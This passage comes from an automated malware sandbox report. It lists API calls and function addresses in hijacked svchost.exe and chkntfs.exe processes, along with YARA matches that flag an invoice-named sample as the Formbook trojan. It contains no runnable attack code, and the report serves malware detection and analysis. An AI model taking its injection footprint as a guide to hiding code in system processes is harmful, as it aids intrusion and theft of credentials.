            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_047E2BA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E3010 NtOpenDirectoryObject,5_2_047E3010
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E3090 NtSetValueKey,5_2_047E3090
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2C00 NtQueryInformationProcess,5_2_047E2C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2CF0 NtOpenProcess,5_2_047E2CF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2CC0 NtQueryVirtualMemory,5_2_047E2CC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E3D70 NtOpenThread,5_2_047E3D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E3D10 NtOpenProcessToken,5_2_047E3D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2D00 NtSetInformationFile,5_2_047E2D00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2DB0 NtEnumerateKey,5_2_047E2DB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2E30 NtWriteVirtualMemory,5_2_047E2E30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2EA0 NtAdjustPrivilegesToken,5_2_047E2EA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2F60 NtCreateProcessEx,5_2_047E2F60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2FA0 NtQuerySection,5_2_047E2FA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2F90 NtProtectVirtualMemory,5_2_047E2F90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2AB0 NtWaitForSingleObject,5_2_047E2AB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2B80 NtQueryInformationFile,5_2_047E2B80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_02669270 NtCreateFile,5_2_02669270
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026693E0 NtReadFile,5_2_026693E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026696D0 NtAllocateVirtualMemory,5_2_026696D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026694D0 NtDeleteFile,5_2_026694D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_02669570 NtClose,5_2_02669570
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188D32_2_004188D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028202_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011602_2_00401160
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041010D2_2_0041010D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101132_2_00410113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031902_2_00403190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416A6D2_2_00416A6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AAF2_2_00416AAF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AB32_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103332_2_00410333
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3B12_2_0040E3B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3B32_2_0040E3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C442_2_00402C44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C502_2_00402C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024A02_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EFD32_2_0042EFD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047A14605_2_047A1460
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0485E4F65_2_0485E4F6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486F43F5_2_0486F43F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048624465_2_04862446
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048705915_2_04870591
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0484D5B05_2_0484D5B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B05355_2_047B0535
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048675715_2_04867571
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048616CC5_2_048616CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047CC6E05_2_047CC6E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B07705_2_047B0770
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047D47505_2_047D4750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486F7B05_2_0486F7B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047AC7C05_2_047AC7C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0485F0CC5_2_0485F0CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486F0E05_2_0486F0E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048670E95_2_048670E9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B70C05_2_047B70C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0479F1725_2_0479F172
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E516C5_2_047E516C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048701AA5_2_048701AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048681CC5_2_048681CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047A01005_2_047A0100
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0484A1185_2_0484A118
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047BB1B05_2_047BB1B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0487B16B5_2_0487B16B
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048512ED5_2_048512ED
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047CB2C05_2_047CB2C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B52A05_2_047B52A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048502745_2_04850274
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0479D34C5_2_0479D34C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_048703E65_2_048703E6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047BE3F05_2_047BE3F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486132D5_2_0486132D
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486A3525_2_0486A352
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047F739A5_2_047F739A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04850CB55_2_04850CB5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486FCF25_2_0486FCF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B0C005_2_047B0C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047A0CF25_2_047A0CF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04829C325_2_04829C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B3D405_2_047B3D40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047BAD005_2_047BAD00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047AADE05_2_047AADE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047CFDC05_2_047CFDC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047C8DBF5_2_047C8DBF
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04861D5A5_2_04861D5A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04867D735_2_04867D73
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486CE935_2_0486CE93
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B0E595_2_047B0E59
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486EEDB5_2_0486EEDB
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486EE265_2_0486EE26
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B9EB05_2_047B9EB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047C2E905_2_047C2E90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486FFB15_2_0486FFB1
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047D0F305_2_047D0F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047F2F285_2_047F2F28
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486FF095_2_0486FF09
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047BCFE05_2_047BCFE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047A2FC85_2_047A2FC8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04824F405_2_04824F40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B1F925_2_047B1F92
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B28405_2_047B2840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047BA8405_2_047BA840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047DE8F05_2_047DE8F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B38E05_2_047B38E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047968B85_2_047968B8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047C69625_2_047C6962
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0487A9A65_2_0487A9A6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B99505_2_047B9950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047CB9505_2_047CB950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047B29A05_2_047B29A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0484DAAC5_2_0484DAAC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0485DAC65_2_0485DAC6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04867A465_2_04867A46
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486FA495_2_0486FA49
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047F5AA05_2_047F5AA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04823A6C5_2_04823A6C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047AEA805_2_047AEA80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_04866BD75_2_04866BD7
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047EDBF95_2_047EDBF9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486AB405_2_0486AB40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0486FB765_2_0486FB76
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047CFB805_2_047CFB80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_02651E205_2_02651E20
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265366A5_2_0265366A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026536AC5_2_026536AC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026536B05_2_026536B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026554D05_2_026554D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0266BBD05_2_0266BBD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264CF305_2_0264CF30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264AFAE5_2_0264AFAE
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264AFB05_2_0264AFB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264CD0A5_2_0264CD0A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264CD105_2_0264CD10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CE7605_2_044CE760
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CD7C85_2_044CD7C8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CD7935_2_044CD793
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CE2A85_2_044CE2A8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044D532C5_2_044D532C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CE3C35_2_044CE3C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C038E5_2_044C038E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CCA835_2_044CCA83
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDC4986_2_04BDC498
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDDCE26_2_04BDDCE2
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD75A86_2_04BD75A8
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDDD286_2_04BDDD28
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDDD246_2_04BDDD24
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD56286_2_04BD5628
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD56266_2_04BD5626
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BF62486_2_04BF6248
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD73886_2_04BD7388
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD73826_2_04BD7382
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDFB486_2_04BDFB48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0479B970 appears 266 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 047F7E54 appears 88 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 047E5130 appears 36 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0481EA12 appears 84 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0482F290 appears 105 times
            Source: INV20240828.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
